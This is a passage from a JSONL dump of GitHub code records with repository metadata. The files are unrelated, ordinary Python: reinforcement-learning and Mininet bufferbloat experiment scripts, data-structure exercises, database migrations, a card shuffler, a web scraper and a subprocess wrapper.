make_default_networks\nfrom Environment.environment import make_environment_spec\nfrom Utilities.FileOperator import load_obj\n\ndef main(_):\n \n # different scenario\n # scenario 1\n # environment_file_name = \"/home/neardws/Documents/Game-Theoretic-Deep-Reinforcement-Learning/Data/scenarios/scenario_1/global_environment_72604a5e5b364143b36131abaffb8b31.pkl\"\n # scenario 2\n # environment_file_name = \"/home/neardws/Documents/Game-Theoretic-Deep-Reinforcement-Learning/Data/scenarios/scenario_2/global_environment_f37a4dc9bd164b529324908d12ca5c40.pkl\"\n # scenario 3\n # environment_file_name = 
\"/home/neardws/Documents/Game-Theoretic-Deep-Reinforcement-Learning/Data/scenarios/scenario_3/global_environment_96e3e39e202547ce9cfd06dc12604a71.pkl\"\n # scenario 4\n # environment_file_name = \"/home/neardws/Documents/Game-Theoretic-Deep-Reinforcement-Learning/Data/scenarios/scenario_4/global_environment_a17bdc9ba084473ab50abdc101037a0e.pkl\"\n\n \n # different compuation resources \n # CPU 1-10GHz\n # environment_file_name = \"/home/neardws/Documents/Game-Theoretic-Deep-Reinforcement-Learning/Data/computation/1GHz/global_environment_5307f0921f624497a364cdfd1072f393.pkl\"\n # CPU 2-10GHz\n # environment_file_name = \"/home/neardws/Documents/Game-Theoretic-Deep-Reinforcement-Learning/Data/computation/2GHz/global_environment_5981cf8e689a476d812ce3357f549493.pkl\"\n # CPU 4-10GHz\n # environment_file_name = \"/home/neardws/Documents/Game-Theoretic-Deep-Reinforcement-Learning/Data/computation/4GHz/global_environment_64289740b65c432eaefe6755ec880c52.pkl\"\n # CPU 5-10GHz\n # environment_file_name = \"/home/neardws/Documents/Game-Theoretic-Deep-Reinforcement-Learning/Data/computation/5GHz/global_environment_53e106efdf0548c5a7e42e1cf0a467d7.pkl\"\n \n # different task number\n # 0.3\n # environment_file_name = \"/home/neardws/Documents/Game-Theoretic-Deep-Reinforcement-Learning/Data/task_number/0_3/global_environment_c2bca604b01a4fe4b379f45794f4654c.pkl\"\n # 0.4\n # environment_file_name = \"/home/neardws/Documents/Game-Theoretic-Deep-Reinforcement-Learning/Data/task_number/0_4/global_environment_3a7afa78fe8443e5a5cc208125749166.pkl\"\n # 0.6\n # environment_file_name = \"/home/neardws/Documents/Game-Theoretic-Deep-Reinforcement-Learning/Data/task_number/0_6/global_environment_6ef83d1602544f9b9fbd255d633a2803.pkl\"\n # 0.7\n # environment_file_name = \"/home/neardws/Documents/Game-Theoretic-Deep-Reinforcement-Learning/Data/task_number/0_7/global_environment_24e747fc18fb4c1da6eb6de2b2581bff.pkl\"\n \n environment = load_obj(environment_file_name)\n\n spec = make_environment_spec(environment)\n \n networks = make_default_networks(spec.actions)\n \n agent = D4PG(\n environment_file=environment_file_name,\n environment_spec=spec,\n networks=networks,\n batch_size=256,\n prefetch_size=4,\n min_replay_size=1000,\n max_replay_size=1000000,\n samples_per_insert=8.0,\n n_step=1,\n sigma=0.3,\n discount=0.996,\n target_update_period=100,\n )\n \n loop = EnvironmentLoop(environment, agent)\n loop.run(4100)\n\n","repo_name":"neardws/Game-Theoretic-Deep-Reinforcement-Learning","sub_path":"Experiment/run_d4pg.py","file_name":"run_d4pg.py","file_ext":"py","file_size_in_byte":3390,"program_lang":"python","lang":"en","doc_type":"code","stars":130,"dataset":"github-code","pt":"53"} +{"seq_id":"15837193361","text":"#filename:stdout_err.py\n#function: show the stdout and stderr\n#stdout, stderr does not add carriage returns for you;\n\nfor i in range(2):\n print ('Brand Asus, HTC in Taiwan') \n\nimport sys\nfor showtimes in range(2):\n sys.stdout.write('Brand Samsung, Apple\\n')\n \nfor showtimes in range(2):\n sys.stderr.write('Brand Samsung, Apple\\n')\n\nprint(\"you can see the color is different between stdout and stderr\")\n","repo_name":"Scott-S-Lin/Python_Programming_ChineseBook","sub_path":"ch5/stdout_err.py","file_name":"stdout_err.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"8033707907","text":"import sys\nimport subprocess\n\nimport six\n\nfrom dmoj.utils.unicode import utf8text\n\nif six.PY2 
and sys.platform == 'win32':\n import _subprocess\n from types import FunctionType, CodeType\n\n from ctypes import byref, windll, c_void_p, Structure, sizeof, c_wchar, WinError, POINTER\n from ctypes.wintypes import BYTE, WORD, LPWSTR, BOOL, DWORD, LPVOID, HANDLE\n\n CREATE_UNICODE_ENVIRONMENT = 0x00000400\n LPSECURITY_ATTRIBUTES = c_void_p\n LPBYTE = POINTER(BYTE)\n\n\n class STARTUPINFOW(Structure):\n _fields_ = [\n ('cb', DWORD), ('lpReserved', LPWSTR),\n ('lpDesktop', LPWSTR), ('lpTitle', LPWSTR),\n ('dwX', DWORD), ('dwY', DWORD),\n ('dwXSize', DWORD), ('dwYSize', DWORD),\n ('dwXCountChars', DWORD), ('dwYCountChars', DWORD),\n ('dwFillAtrribute', DWORD), ('dwFlags', DWORD),\n ('wShowWindow', WORD), ('cbReserved2', WORD),\n ('lpReserved2', LPBYTE), ('hStdInput', HANDLE),\n ('hStdOutput', HANDLE), ('hStdError', HANDLE),\n ]\n\n\n LPSTARTUPINFOW = POINTER(STARTUPINFOW)\n\n\n class PROCESS_INFORMATION(Structure):\n _fields_ = [\n ('hProcess', HANDLE), ('hThread', HANDLE),\n ('dwProcessId', DWORD), ('dwThreadId', DWORD),\n ]\n\n\n LPPROCESS_INFORMATION = POINTER(PROCESS_INFORMATION)\n\n\n class WindowsHandle(c_void_p):\n \"\"\"Emulate the handle objects in _subprocess.\"\"\"\n\n def __init__(self, *a, **kw):\n super(WindowsHandle, self).__init__(*a, **kw)\n self.closed = False\n\n def Close(self):\n if not self.closed:\n windll.kernel32.CloseHandle(self)\n self.closed = True\n\n def __int__(self):\n return self.value\n\n\n # Using LoadLibrary to avoid our argtypes conflicting.\n CreateProcessW = windll.LoadLibrary('kernel32.dll').CreateProcessW\n CreateProcessW.argtypes = [\n LPWSTR, LPWSTR, LPSECURITY_ATTRIBUTES,\n LPSECURITY_ATTRIBUTES, BOOL, DWORD, LPVOID, LPWSTR,\n LPSTARTUPINFOW, LPPROCESS_INFORMATION,\n ]\n CreateProcessW.restype = BOOL\n\n\n def CreateProcess(executable, args, _p_attr, _t_attr,\n inherit_handles, creation_flags, env, cwd,\n startup_info):\n int_or_none = lambda x: None if x is None else int(x)\n\n si = STARTUPINFOW(\n dwFlags=startup_info.dwFlags,\n wShowWindow=startup_info.wShowWindow,\n cb=sizeof(STARTUPINFOW),\n hStdInput=int_or_none(startup_info.hStdInput),\n hStdOutput=int_or_none(startup_info.hStdOutput),\n hStdError=int_or_none(startup_info.hStdError),\n )\n\n wenv = None\n if env is not None:\n env = (u''.join(u'%s=%s\\0' % (k, v) for k, v in env.items())) + u'\\0'\n wenv = (c_wchar * len(env))()\n wenv.value = env\n\n pi = PROCESS_INFORMATION()\n creation_flags |= CREATE_UNICODE_ENVIRONMENT\n\n if CreateProcessW(executable, args, None, None,\n inherit_handles, creation_flags,\n wenv, utf8text(cwd), byref(si), byref(pi)):\n return (WindowsHandle(pi.hProcess), WindowsHandle(pi.hThread),\n pi.dwProcessId, pi.dwThreadId)\n raise WinError()\n\n\n class FakeSubprocess(object):\n def __getattribute__(self, item):\n if item == 'CreateProcess':\n return CreateProcess\n else:\n return getattr(_subprocess, item)\n\n\n def replace_globals(function, new_globals):\n func_globals = function.func_globals.copy()\n func_globals.update(new_globals)\n return FunctionType(function.func_code, func_globals, function.func_name,\n function.func_defaults, function.func_closure)\n\n\n def replace_consts(function, new_consts):\n code = function.func_code\n consts = tuple(new_consts.get(const, const) for const in code.co_consts)\n new_code = CodeType(code.co_argcount, code.co_nlocals, code.co_stacksize, code.co_flags,\n code.co_code, consts, code.co_names, code.co_varnames, code.co_filename,\n code.co_name, code.co_firstlineno, code.co_lnotab, code.co_freevars,\n code.co_cellvars)\n 
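# Code objects are immutable in Python 2, so a fresh code object is built with\n # the swapped-in constants and assigned back to the function's func_code below.\n 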
function.func_code = new_code\n\n\n class Popen(subprocess.Popen):\n _execute_child = replace_globals(subprocess.Popen._execute_child.im_func, {\n '_subprocess': FakeSubprocess(),\n })\n replace_consts(_execute_child, {'{} /c \"{}\"': u'{} /c \"{}\"'})\n\n\n call = replace_globals(subprocess.call, {'Popen': Popen})\n check_call = replace_globals(subprocess.check_call, {'call': call})\n check_output = replace_globals(subprocess.check_output, {'Popen': Popen})\nelse:\n Popen = subprocess.Popen\n call = subprocess.call\n check_call = subprocess.check_call\n check_output = subprocess.check_output\n","repo_name":"alps-jbnu/litmus-judge","sub_path":"dmoj/utils/uniprocess.py","file_name":"uniprocess.py","file_ext":"py","file_size_in_byte":4990,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"27782514959","text":"class Node:\n def __init__(self, val):\n self.left = None\n self.right = None\n self.val = val\n\nroot = Node(44)\n\nroot.left = Node(17)\nroot.right = Node(88)\nroot.left.left = Node(8)\nroot.left.right = Node(32)\nroot.left.right.left = Node(28)\nroot.left.right.left.right = Node(29)\nroot.right.right = Node(97)\nroot.right.right.left = Node(93)\nroot.right.left = Node(65)\nroot.right.left.left = Node(54)\nroot.right.left.right = Node(82)\nroot.right.left.right.left = Node(76)\nroot.right.left.right.left.left = Node(68)\nroot.right.left.right.left.right = Node(80)\n\ndef search(root, val):\n curr = root\n\n while curr:\n if val == curr.val:\n return curr\n\n if val < curr.val:\n curr = curr.left\n\n else:\n curr = curr.right\n\n return None\n\ndef insert(root, val):\n new = Node(val)\n\n prev = None\n curr = root\n\n while curr is not None:\n if val == curr.val:\n return\n\n if val < curr.val:\n prev = curr\n curr = curr.left\n\n else:\n prev = curr\n curr = curr.right\n\n if val < prev.val:\n prev.left = new\n else:\n prev.right = new\n\n return root\n\nnewroot = insert(root, 33)\n# print(insert(root, 33))\nprint(search(newroot, 33))","repo_name":"n-gibs/dsa","sub_path":"trees/foundation/insertBST.py","file_name":"insertBST.py","file_ext":"py","file_size_in_byte":1287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42464381737","text":"a = float(input())\nb = float(input())\nc = float(input())\nd = float(input())\ne = float(input())\nf = float(input())\n\nepsilon = 10 ** -6\n\naIsZero = abs(a) < epsilon\nbIsZero = abs(b) < epsilon\ncIsZero = abs(c) < epsilon\ndIsZero = abs(d) < epsilon\neIsZero = abs(e) < epsilon\nfIsZero = abs(f) < epsilon\n\nif aIsZero and bIsZero and not eIsZero:\n print(0)\n\nelif cIsZero and dIsZero and not fIsZero:\n print(0)\n\nelif aIsZero and bIsZero and eIsZero:\n if cIsZero and dIsZero and fIsZero:\n print(5)\n elif cIsZero:\n y = f / d\n print(4, y)\n elif dIsZero:\n x = f / c\n print(3, x)\n else:\n p = (-c) / d\n q = f / d\n print(1, p, q)\n\nelif cIsZero and dIsZero and fIsZero:\n if aIsZero:\n y = e / b\n print(4, y)\n elif bIsZero:\n x = e / a\n print(3, x)\n else:\n p = (-a) / b\n q = e / b\n print(1, p, q)\n\nelif aIsZero and cIsZero:\n y1 = e / b\n y2 = f / d\n if abs(y1 - y2) < epsilon:\n print(4, y1)\n else:\n print(0)\n\nelif bIsZero and dIsZero:\n x1 = e / a\n x2 = f / c\n if abs(x1 - x2) < epsilon:\n print(3, x1)\n else:\n print(0)\n\nelif aIsZero and dIsZero:\n x = f / c\n y = e / b\n print(2, x, y)\n\nelif cIsZero and bIsZero:\n x = e / a\n y = f / d\n print(2, x, y)\n\nelif aIsZero:\n y = e / b\n x = (f - d * y) / c\n 
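# (a == 0 and the mixed-zero cases are handled above, so b, c and d are nonzero\n # here: y follows from the first equation, x from the second.)\n 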
print(2, x, y)\n\nelif bIsZero:\n x = e / a\n y = (f - c * x) / d\n print(2, x, y)\n\nelif cIsZero:\n y = f / d\n x = (e - b * y) / a\n print(2, x, y)\n\nelif dIsZero:\n x = f / c\n y = (e - a * x) / b\n print(2, x, y)\n\nelif abs(a * d - b * c) < epsilon:\n p1 = (-a) / b\n p2 = (-c) / d\n q1 = e / b\n q2 = f / d\n if abs(p1 - p2) < epsilon and abs(q1 - q2) < epsilon:\n print(1, p1, q1)\n else:\n print(0)\n\nelse:\n y = (a * f - c * e) / (a * d - b * c)\n x = (e - b * y) / a\n print(2, x, y)\n","repo_name":"pavelbrnv/Coursera","sub_path":"PythonBasis/week03/task13.py","file_name":"task13.py","file_ext":"py","file_size_in_byte":1920,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29467477263","text":"# Question 1\n\ndef hello_name():\n message = \"Enter Username: \"\n username = input(message)\n return f\"Hello, {username}!\"\nprint(hello_name())\n\n# Question 2\n\ndef first_odds():\n odd_numbers = list(range(1,100,2))\n return odd_numbers\n\nprint (first_odds())\n\n# Question 3\n\ndef max_num_in_list( a_list ): \n max = a_list[ 0 ] \n for a in a_list: \n if a > max: \n max = a \n return max \nprint(max_num_in_list([1, 2, -8, 0])) \n\n# Question 4\n\ndef is_leap_year(a_year):\n if a_year % 400 == 0:\n return True\n if a_year % 100 == 0:\n return False\n if a_year % 4 == 0:\n return True\n else:\n return False\nprint(is_leap_year(2000))\nprint(is_leap_year(2008))\n\n# Question 5\n\ndef is_Consecutive(a_list):\n return sorted(a_list) == list(range(min(a_list), max(a_list)+1))\na_listst = [2, 3, 1, 4, 5]\nprint(is_Consecutive(a_listst))\n","repo_name":"Adharia11/Python-prework","sub_path":"Prework_hw.py","file_name":"Prework_hw.py","file_ext":"py","file_size_in_byte":892,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9859101489","text":"from mininet.topo import Topo\nfrom mininet.node import CPULimitedHost\nfrom mininet.link import TCLink\nfrom mininet.net import Mininet\nfrom mininet.log import lg, info\nfrom mininet.util import dumpNodeConnections\nfrom mininet.cli import CLI\n\nfrom subprocess import Popen, PIPE\nfrom time import sleep, time\nfrom multiprocessing import Process\nfrom argparse import ArgumentParser\nfrom helper import avg, stdev\n\nfrom monitor import monitor_qlen\n\nimport sys\nimport os\nimport math\n\nparser = ArgumentParser(description=\"Bufferbloat tests\")\nparser.add_argument('--bw-host', '-B',\n type=float,\n help=\"Bandwidth of host links (Mb/s)\",\n default=1000)\n\nparser.add_argument('--bw-net', '-b',\n type=float,\n help=\"Bandwidth of bottleneck (network) link (Mb/s)\",\n required=True)\n\nparser.add_argument('--delay',\n type=float,\n help=\"Link propagation delay (ms)\",\n required=True)\n\nparser.add_argument('--dir', '-d',\n help=\"Directory to store outputs\",\n required=True)\n\nparser.add_argument('--time', '-t',\n help=\"Duration (sec) to run the experiment\",\n type=int,\n default=10)\n\nparser.add_argument('--maxq',\n type=int,\n help=\"Max buffer size of network interface in packets\",\n default=100)\n\n# Linux uses CUBIC-TCP by default that doesn't have the usual sawtooth\n# behaviour. 
For those who are curious, invoke this script with\n# --cong cubic and see what happens...\n# sysctl -a | grep cong should list some interesting parameters.\nparser.add_argument('--cong',\n help=\"Congestion control algorithm to use\",\n default=\"reno\")\n\n# Expt parameters\nargs = parser.parse_args()\n\nclass BBTopo(Topo):\n \"Simple topology for bufferbloat experiment.\"\n def build(self, n=2):\n # create two hosts\n h1 = self.addHost(\"h1\")\n h2 = self.addHost(\"h2\")\n\n # Here I have created a switch. If you change its name, its\n # interface names will change from s0-eth1 to newname-eth1.\n switch = self.addSwitch('s0')\n\n self.addLink(h1, switch, bw=args.bw_host, delay=args.delay, max_queue_size=args.maxq)\n self.addLink(h2, switch, bw=args.bw_net, delay=args.delay, max_queue_size=args.maxq)\n\n# Simple wrappers around monitoring utilities. You are welcome to\n# contribute neatly written (using classes) monitoring scripts for\n# Mininet!\n\ndef start_iperf(net):\n h1 = net.get('h1')\n h2 = net.get('h2')\n print(\"Starting iperf server...\")\n # For those who are curious about the -w 16m parameter, it ensures\n # that the TCP flow is not receiver window limited. If it is,\n # there is a chance that the router buffer may not get filled up.\n server = h2.popen(\"iperf -s -w 16m\")\n client = h1.popen(\"iperf -c %s -t %s > %s/iperf.out\" % (h2.IP(), args.time, args.dir), shell=True)\n\ndef start_qmon(iface, interval_sec=0.1, outfile=\"q.txt\"):\n monitor = Process(target=monitor_qlen,\n args=(iface, interval_sec, outfile))\n monitor.start()\n return monitor\n\ndef start_ping(net):\n # Hint: Use host.popen(cmd, shell=True). If you pass shell=True\n # to popen, you can redirect cmd's output using shell syntax.\n # i.e. ping ... > /path/to/ping.\n h1 = net.get('h1')\n h2 = net.get('h2')\n h1.popen(\"ping -i 0.1 %s > %s/ping.txt\"%(h2.IP(), args.dir), shell=True)\n\ndef start_webserver(net):\n h1 = net.get('h1')\n proc = h1.popen(\"python webserver.py\", shell=True)\n sleep(1)\n return [proc]\n\ndef bufferbloat():\n if not os.path.exists(args.dir):\n os.makedirs(args.dir)\n os.system(\"sysctl -w net.ipv4.tcp_congestion_control=%s\" % args.cong)\n topo = BBTopo()\n net = Mininet(topo=topo, host=CPULimitedHost, link=TCLink)\n net.start()\n # This dumps the topology and how nodes are interconnected through\n # links.\n dumpNodeConnections(net.hosts)\n # This performs a basic all pairs ping test.\n net.pingAll()\n\n qmon = start_qmon(iface='s0-eth2',\n outfile='%s/q.txt' % (args.dir))\n\n # start iperf, webserver, and ping\n start_iperf(net)\n handler = start_webserver(net)\n start_ping(net)\n\n h1 = net.get('h1')\n h2 = net.get('h2')\n\n start_time = time()\n all_times = []\n\n # measure the time it takes to complete webpage transfer\n while True:\n # do the measurement (say) 3 times.\n sleep(5)\n now = time()\n delta = now - start_time\n if delta > args.time:\n break\n print(\"%.1fs left...\" % (args.time - delta))\n for i in range (0,3):\n dl_time = h2.popen('curl -o /dev/null -s -w %%{time_total} %s/index.html' % h1.IP(), shell=True).communicate()[0]\n all_times.append(float(dl_time))\n print(all_times)\n\n # Hint: The command below invokes a CLI which you can use to\n # debug. It allows you to run arbitrary commands inside your\n # emulated hosts h1 and h2.\n # CLI(net)\n\n print(\"The average time:\")\n print(avg(all_times))\n print(\"The standard deviation:\")\n print(stdev(all_times))\n\n # Hint: The command below invokes a CLI which you can use to\n # debug. 
It allows you to run arbitrary commands inside your\n # emulated hosts h1 and h2.\n # CLI(net)\n\n qmon.terminate()\n net.stop()\n # Ensure that all processes you create within Mininet are killed.\n # Sometimes they require manual killing.\n Popen(\"pgrep -f webserver.py | xargs kill -9\", shell=True).wait()\n\nif __name__ == \"__main__\":\n bufferbloat()\n","repo_name":"teresalee1231/p3","sub_path":"bufferbloat.py","file_name":"bufferbloat.py","file_ext":"py","file_size_in_byte":5736,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"42874926841","text":"# https://school.programmers.co.kr/learn/courses/30/lessons/86052\n# to right to down to left to up\nd = {0: (0, 1), 1: (1, 0), 2: (0, -1), 3: (-1, 0)}\ncycle = []\n\ndef get_in(p, c):\n if p == 'L':\n c = c - 1 if c - 1 >= 0 else len(d) - 1\n elif p == 'R':\n c = (c + 1) % len(d)\n\n return c\n \ndef go_cycle(depth, y, x, direction):\n global cycle\n \n if depth == 0:\n cycle = []\n elif depth > max_try:\n return 0\n \n if depth > 0:\n cy, cx, cout = cycle[0]\n if cx == x and cy == y and cout == direction:\n print(cycle, y, x, direction)\n return len(cycle)\n \n c = (y, x, direction)\n cycle.append(c)\n\n nx = (x + d[direction][1]) % max_x\n if nx < 0:\n nx = max_x - 1\n\n ny = (y + d[direction][0]) % max_y\n if ny < 0:\n ny = max_y - 1\n\n return go_cycle(depth + 1, ny, nx, get_in(m[ny][nx], direction))\n\ndef solution(grid):\n answer = []\n global m\n global max_try\n global max_x\n global max_y\n \n m = [[c for c in r] for r in grid]\n max_x = len(m[0])\n max_y = len(m)\n max_try = (max_x * max_y) ** 2\n \n for i, c in enumerate(m):\n for j, n in enumerate(c):\n if i == 0:\n answer.append(go_cycle(0, i, j, 1))\n if i == len(m) - 1:\n answer.append(go_cycle(0, i, j, 3))\n if j == 0:\n answer.append(go_cycle(0, i, j, 0))\n if j == len(c) - 1:\n answer.append(go_cycle(0, i, j, 2))\n \n return sorted(list(filter(lambda x: x > 0, answer)))","repo_name":"freean2468/programmers","sub_path":"Programming/Lv.2/빛의 경로 사이클/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32894903037","text":"import torch\nimport sys\nfrom src import fishfactor\nimport random\nimport numpy as np\nimport os\n\ndevice = sys.argv[1]\nn_cells_list = [2, 3, 5, 10, 15, 20]\n\nfor dataset in range(10):\n for intensity_scale in [100, 300]:\n data = torch.load(\n '../../data/simulated/data/shared/{}_{}.pt'\n .format(dataset, intensity_scale))\n\n for n_cells in n_cells_list:\n cells_data = data['coordinates'].query('cell < {}'.format(n_cells)).copy()\n\n torch.manual_seed(1234)\n random.seed(1234)\n np.random.seed(1234)\n\n model = fishfactor.FISHFactor(\n data=cells_data,\n n_factors=3,\n device=device,\n n_inducing=100,\n grid_res=50,\n factor_smoothness=1.5,\n masks_threshold=0.4,\n init_bin_res=5,\n ).to(device=device)\n\n model.inference(\n lr=5e-3,\n lrd=1.,\n n_particles=15,\n early_stopping_patience=100,\n min_improvement=0.001,\n max_epochs=10000,\n save=True,\n save_every=100,\n save_dir='results/multicell/{}_{}_{}/'\n .format(dataset, intensity_scale, n_cells),\n )","repo_name":"bioFAM/FISHFactor","sub_path":"experiments/02_multicell/run_multicell.py","file_name":"run_multicell.py","file_ext":"py","file_size_in_byte":1340,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"53"} +{"seq_id":"38676242969","text":"# -*- 
coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n    dependencies = [\n        ('forum', '0007_auto_20150403_0056'),\n    ]\n\n    operations = [\n        migrations.AddField(\n            model_name='userprofile',\n            name='thumbnail1',\n            field=models.ImageField(null=True, upload_to='profile_images/thumbs/', blank=True),\n            preserve_default=True,\n        ),\n        migrations.AddField(\n            model_name='userprofile',\n            name='thumbnail2',\n            field=models.ImageField(null=True, upload_to='profile_images/thumbs/', blank=True),\n            preserve_default=True,\n        ),\n    ]\n","repo_name":"waiyaki/django-by-example-forum","sub_path":"forum/migrations/0008_auto_20150404_1106.py","file_name":"0008_auto_20150404_1106.py","file_ext":"py","file_size_in_byte":727,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34045426762","text":"# Author: Alejandro Sanchez Uribe\n# Class: BTE 499\n# Date: 22 March 2019\n# Assignment: Assignment 5\n\nimport Deck\nimport random\n\n\ndef simple_shuffle(deck):\n    stack1, stack2 = Deck.Deck(), Deck.Deck()\n\n    for i in range(deck.size()//2):\n        stack1.push(deck.top())\n        deck.pop()\n\n    for i in range(deck.size()):\n        stack2.push(deck.top())\n        deck.pop()\n\n    for i in range(stack1.size() + stack2.size()):\n        if i % 2 == 0:\n            deck.push(stack2.top())\n            stack2.pop()\n        else:\n            deck.push(stack1.top())\n            stack1.pop()\n\n\ndef fisher_yates_shuffle(deck):\n    temp_deck = []\n\n    initial_size = deck.size()\n\n    for i in range(initial_size - 1):\n        node_picked = random.randint(0, deck.size()-1)\n        temp_deck.append(deck.getInnerNode(node_picked))\n        deck.deleteInnerNode(node_picked)\n\n    for card in temp_deck:\n        deck.push(card)\n","repo_name":"alex-sa-ur/python-bte499","sub_path":"bte499.hw5.alejandrosanchezuribe/Shuffler.py","file_name":"Shuffler.py","file_ext":"py","file_size_in_byte":915,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2238858796","text":"from bs4 import BeautifulSoup\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.chrome.options import Options\r\nfrom time import sleep\r\n\r\ndriver = webdriver.Chrome('chromedriver')\r\ndriver.get('https://www.pimkie.fr/c-accessoires-mode')\r\nsleep(2)\r\nlast_height = driver.execute_script(\"return document.body.scrollHeight\")\r\n\r\n\r\nwhile True:\r\n    # Scroll down to the bottom.\r\n    driver.execute_script(\"window.scrollTo(0, document.body.scrollHeight);\")\r\n\r\n    # Wait to load the page.\r\n    sleep(2)\r\n\r\n    # Calculate new scroll height and compare with last scroll height.\r\n    new_height = driver.execute_script(\"return document.body.scrollHeight\")\r\n\r\n    if new_height == last_height:\r\n        break\r\n    last_height = new_height\r\n\r\nresponse = driver.execute_script(\"return document.documentElement.outerHTML\")\r\nsoup = BeautifulSoup(response,'lxml')\r\napp = soup.find_all('a',class_ = 'thumb-link')\r\nfor x in app:\r\n    # search inside each product link; calling find_all on the ResultSet 'app' raises AttributeError\r\n    for y in x.find_all('div',class_ = 'product-name'):\r\n        print(y)\r\n        \r\n","repo_name":"karansharma002/Discord","sub_path":"Scraper.py","file_name":"Scraper.py","file_ext":"py","file_size_in_byte":1005,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"6940739325","text":"\"\"\"empty message\n\nRevision ID: b590f62c7e1c\nRevises: f3f327ab19e9\nCreate Date: 2017-10-14 16:00:05.224665\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import mysql\n\n# 
revision identifiers, used by Alembic.\nrevision = 'b590f62c7e1c'\ndown_revision = 'f3f327ab19e9'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n    # ### commands auto generated by Alembic - please adjust! ###\n    op.create_table('events',\n    sa.Column('id', sa.Integer(), nullable=False),\n    sa.Column('fullnames', sa.String(length=100), nullable=True),\n    sa.Column('mobilenumber', sa.Integer(), nullable=True),\n    sa.Column('nationalid', sa.Integer(), nullable=True),\n    sa.Column('deptamount', sa.Integer(), nullable=True),\n    sa.Column('description', sa.String(length=200), nullable=True),\n    sa.PrimaryKeyConstraint('id'),\n    sa.UniqueConstraint('fullnames')\n    )\n    op.create_index(op.f('ix_events_deptamount'), 'events', ['deptamount'], unique=False)\n    op.create_index(op.f('ix_events_mobilenumber'), 'events', ['mobilenumber'], unique=True)\n    op.create_index(op.f('ix_events_nationalid'), 'events', ['nationalid'], unique=True)\n    op.drop_table('deptors')\n    # ### end Alembic commands ###\n\n\ndef downgrade():\n    # ### commands auto generated by Alembic - please adjust! ###\n    op.create_table('deptors',\n    sa.Column('id', mysql.INTEGER(display_width=11), nullable=False),\n    sa.Column('fullnames', mysql.VARCHAR(length=100), nullable=True),\n    sa.Column('mobilenumber', mysql.INTEGER(display_width=11), autoincrement=False, nullable=True),\n    sa.Column('nationalid', mysql.INTEGER(display_width=11), autoincrement=False, nullable=True),\n    sa.Column('deptamount', mysql.INTEGER(display_width=11), autoincrement=False, nullable=True),\n    sa.Column('description', mysql.VARCHAR(length=200), nullable=True),\n    sa.PrimaryKeyConstraint('id'),\n    mysql_default_charset=u'latin1',\n    mysql_engine=u'InnoDB'\n    )\n    op.drop_index(op.f('ix_events_nationalid'), table_name='events')\n    op.drop_index(op.f('ix_events_mobilenumber'), table_name='events')\n    op.drop_index(op.f('ix_events_deptamount'), table_name='events')\n    op.drop_table('events')\n    # ### end Alembic commands ###\n","repo_name":"crakama/EventsPlanner","sub_path":"migrations/versions/b590f62c7e1c_.py","file_name":"b590f62c7e1c_.py","file_ext":"py","file_size_in_byte":2223,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18268108738","text":"from typing import List  # needed for the List[List[int]] annotation below\n\n\nclass TreeNode:\n    def __init__(self, val=0, left=None, right=None):\n        self.val = val\n        self.left = left\n        self.right = right\n    \n    \nclass Solution:\n    def levelOrder(self, root: TreeNode) -> List[List[int]]:\n        if root is None:\n            return []\n        a = [[] for i in range(2048)]  # fixed-size level buffer; assumes the tree is shallower than 2048\n        depth = 1\n        b = self.get_level_order(root, a, depth)\n        b[0].append(root.val)\n        ans = [el for el in b if el != []]\n        return ans\n    \n    def get_level_order(self, node, a, depth):\n        if node is None:\n            return a\n        children_nodes = self.get_children_nodes(node)\n        if children_nodes is not None:\n            for children_node in children_nodes:\n                a[depth].append(children_node)\n        a = self.get_level_order(node.left, a, depth + 1)\n        a = self.get_level_order(node.right, a, depth + 1)\n        return a\n    \n    def get_children_nodes(self, node):\n        left = node.left\n        right = node.right\n        if left is None and right is None:\n            return None\n        if left is None:\n            return [right.val]\n        if right is None:\n            return [left.val]\n        return [left.val, right.val]\n","repo_name":"aeglushkov/leetcode-tasks","sub_path":"algorithms/Tree/102. 
Binary Tree Level Order Traversal/solving.py","file_name":"solving.py","file_ext":"py","file_size_in_byte":1219,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26901217155","text":"import base64\nimport hashlib\n\nfrom federatedml.util import LOGGER\n\n\nclass Encode:\n def __init__(self, method, base64=0):\n self.method = method\n self.base64 = base64\n\n self.dist_encode_function = {\n \"md5\": self.__compute_md5,\n \"sha1\": self.__compute_sha1,\n \"sha224\": self.__compute_sha224,\n \"sha256\": self.__compute_sha256,\n \"sha384\": self.__compute_sha384,\n \"sha512\": self.__compute_sha512,\n }\n\n @staticmethod\n def is_support(method):\n support_encode_method = [\"md5\", \"sha1\", \"sha224\", \"sha256\", \"sha384\", \"sha512\"]\n return method in support_encode_method\n\n def __compute_md5(self, value):\n if self.base64 == 1:\n return str(base64.b64encode(hashlib.md5(bytes(value, encoding='utf-8')).digest()), \"utf-8\")\n else:\n return hashlib.md5(bytes(value, encoding='utf-8')).hexdigest()\n\n def __compute_sha256(self, value):\n if self.base64 == 